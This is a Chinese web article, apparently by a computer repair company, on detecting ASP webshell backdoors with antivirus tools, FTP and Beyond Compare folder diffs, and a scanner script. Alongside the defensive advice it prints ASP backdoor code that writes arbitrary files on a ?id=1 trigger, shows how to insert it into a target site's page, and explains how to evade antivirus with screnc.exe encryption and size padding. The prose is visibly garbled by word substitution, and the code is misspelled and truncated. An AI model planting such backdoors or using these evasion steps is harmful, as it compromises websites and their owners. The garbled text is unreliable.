彻底找出web空间中的asp后门

  前一段时间以来，动网爆出了好几个重量级另外毛病，个个都能导致入侵者在web空间中放置asp木马，asp木马可是网站管理员非常头疼的东西，它潜伏性高、功能强，再加上不停翻新的种类来逃避杀毒软件，一旦web空间被放置了差别种类的asp木马，那么扫除起来非常麻烦，很多朋侪在仔细整理web空间之后，仍然将asp木马驱之不尽，只有更换了全部的web文件，非常无法！
  网上的一些防范asp木马的教程都基于提早防范的基础之上，例如：克制FSO，利用NTFS限制用户目录等等。这些要领固然有用，但是都是基于提早防范的，并且对付一般的买空间来做网站的朋侪来说显然不可能。我在这里讲讲怎样有用的发现web空间中的asp木马并扫除。
  通过帮朋侪整理web空间摸索出了一些本领，这些本领还挺管用，不敢独享，拿出来共享。
  一．本领1：杀毒软件查杀
  一些朋侪可能在乐成得到上传权限之后，上传的asp木马是一些非常有名的asp木马，例如：cmdasp，海洋顶端木马，这些木马固然功能壮大，但是早已经被杀毒软件列入了黑名单，所以利用杀毒软件对web空间中的文件举行扫描，可以有用的发现并扫除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马，木马标注为：Script.ASP.Rootkit.10.a（如图1），在瑞星的网站上搜刮一下，可以晓得这便是海洋顶端木马。
  利用这种要领，可以有用的对抗一些小菜上传的asp木马，结果显着。
  二．本领2：FTP客户端比拟
  上面的要领固然对菜鸟入侵者比较管用，但是遇到轻微有点意识的入侵者来说，几乎失去结果，因为他们完全可以对asp木马举行伪装，加密，使其潜藏杀毒软件，如许的手法比较多，我小我私家比较喜欢微软开辟个的一个asp加密小工具：screnc.exe，screnc.exe是一款ASP加密程序，加密的程式比较宁静，使代码完全改变，使用也非常简单。只必要在下令下输入：
  screnc.exe，得到资助下令：Usage:   screnc [/?] [/s] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] ，凭据提示，只必要输入：screnc.exe 要加密的asp木马名 输入的asp木马名，就可以完成加密伪装（如图2）。
  颠末加密之后，记事本打开检察，可以看到标签：<% ……%>，
  等标签内的代码成为一些“乱码”，而杀毒软件查杀asp木马是通过搜刮关键字来查杀，着姨妈可以或许显然就躲过查杀。
  隆重官方网站被黑，挂的网页木马代码便是利用screnc.exe来加密的，过了好几天才被发现，可见加密伪装手法的高超。
  所以要接纳另外的措施敷衍这种加密伪装的asp木马，我们可以利用一些FTP客户端软件（例如cuteftp，FlashFXP）提供的文件比拟功能，通过比拟FTP的中的web文件和当地的备份文件，发现是否错出可疑文件。
  这里以FlashFXP举行操作讲解。
  步骤1：打开FlashFXP，在右边窗口中跳转到当地web备份文件目录，在右边的FTP窗口中跳转到web目录下。
  步骤2：点工具栏中的“工具”，选择此中的“比较文件夹下令”，即可举行比拟文件夹，速度非常快。
  从图中，我们可以清楚的看到196个对象被过滤，在FTP空间中多出了如许几个asp文件：.asp，2005.asp等（如图3），这十有八九便是入侵者留下的asp后门，打开确认一下即可。
  三．本领3：用Beyond Compare 2举行比拟
  上面的利用FTP客户端比拟文件的要领，固然有用，但是遇到渗透入文件的asp木马，那就无能为力了，这里介绍一款渗透性asp木马，可以将代码插入到指定web文件中，通常情况下不会显示，只有使用触发语句才气打开asp木马，其潜伏性非常高。代码如下：
  <%
  on error resume next
  id=request("id")
  if request("id")=1 then
  testfile=Request.form("name")
  msg=Request.form("message")
  set fs=server.CreatObject("scripting.filesystemobject")
  set thisfile=fs.openTestFile(testfile,8,True,0)
  thisfile.Writeline(""&msg&"")
  thisfile.close
  set fs=nothing
  %>
 
    Value=<%=server.mappath("XP.ASP")%>>
  <br />  
    class=input>
 
  <%end if%>
  细致：在修正目的主机的web文件时，要细致如许的文件修正后没有结果，即含有类似于：如许的文件包含下令，如许的代码存在时，参加asp代码后根本不会显示出剧本后门，但是剧本后门代码不会影响原文件的显示和功能。
  假如已经对目的办事器www.target.com下的一个editor_InsertPic.asp文件举行了修正，插入了剧本后门代码，那么打开的方式是：www. target..com/editor_InsertPic.asp?id=1,细致后门的字符?id=1，有了这些字符，才气包管剧本后门显示出来！普通情况下打开www. target..com/editor_InsertPic.asp?id=1，是不会露出破绽的。
  这招真是asp木马放置中非常狠的，要是遇到如许的情况，该怎么办？我们可以利用一款专业的文件比拟工具Beyond Compare 2来完成木马的查找。
  Beyond Compare 2一款不可多得的专业级的文件夹和文件比拟工具。使用它可以很方便的比拟出两个文件夹或者文件的差别之处。并把相差的每一个字节用颜色加以表示，检察方便。并且支持多种规则比拟。
  看我来利用它完成渗透性asp木马的查找。
  步骤1：打开Beyond Compare 2，点工具栏中的“比较使命”，选择此中的选项：新建，在“比较形式”中选择“比较两个文件夹”（如图4）。进入一下步，选择必要比拟的两个文件夹路径，即备份过的网站文件以及从FTP上下载的网站文件，再在上面的“文件过滤器”中选择“包括全部文件”（如图5）。在“比较范畴”中选择“文件大小”（如图6）。设置终了即可开端比较。
  步骤2：比较终了，软件界面左右双方分别显示了比较的结果，从中可以很容易找到哪个目录多出了什么文件（如图7）。
  步骤3：文件名相同，但是大小差别的文件，会被软件用另外的颜色标注出来，选择上它们，然后选择工具栏的“操作”中的“比较内容”功能，即可展开两个文件的细致内容（如图8），从中我们可以看到FTP真个文件被插入了渗透asp木马。这下很容易找到了吧！
  四．本领4：利用组件功能找asp木马
  上面分门别类的介绍了几种asp木马的放置与查杀本领，一般的菜鸟，老鸟恐怕都是利用上面的要领来放置asp木马吧！所以可以有用的对抗web空间中上传的asp木马。这下可以安枕无忧了吧？呵呵！先别急，还有一种BT的asp木马放置要领，你可能很难想到，放置思路是如许的：在目的web空间中寻找一个不常用的，比较合适的asp文件，打开它对其举行代码精简，然后再将渗透asp木马的代码插入，再对其举行精简，直至与本来的文件大小一样。末了利用加密伪装的手法对其举行处置惩罚。如许就彻底练就了一个绝对隐藏的asp木马后门，一般的入侵者恐怕很难做到这一点，因为要精简代码的同时还要包管asp木马的功能不会错误。
  要是你恰恰遇到一个如许的入侵者，那么该怎么才气查出被他放置的asp木马呢？你可能以为这已经不太可能了，呵呵！完全可能，看我拿出宝物来：思易asp木马追捕。
  它是一款专门检索种种asp文件所带功能的asp软件，通过搜刮asp木马含有的特别字符，以及搜刮利用变量创建对象及静态对象建立的代码，来找出可能含有疑点的asp文件，从而有用的防范asp木马。
  使用非常简单，只必要将文件asplist2.0.asp上传到web空间下，然后在地址拦中打开，就完成了全部asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马（如图9），这些功能也都是asp木马常用的：FSO，WS，SHELL，XML等等。
  一般的web文件很少具有如许的功能，只有那些可恶的asp木马本领有，可以看到一些文件具备了相当多的功能，这时间，就可以打开这些文件来确认是否是asp木马，非常有用。
  各人在查找web空间的asp木马时，最好几种要领联合起来，如许就能有用的查杀被隐藏起来的asp木马。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：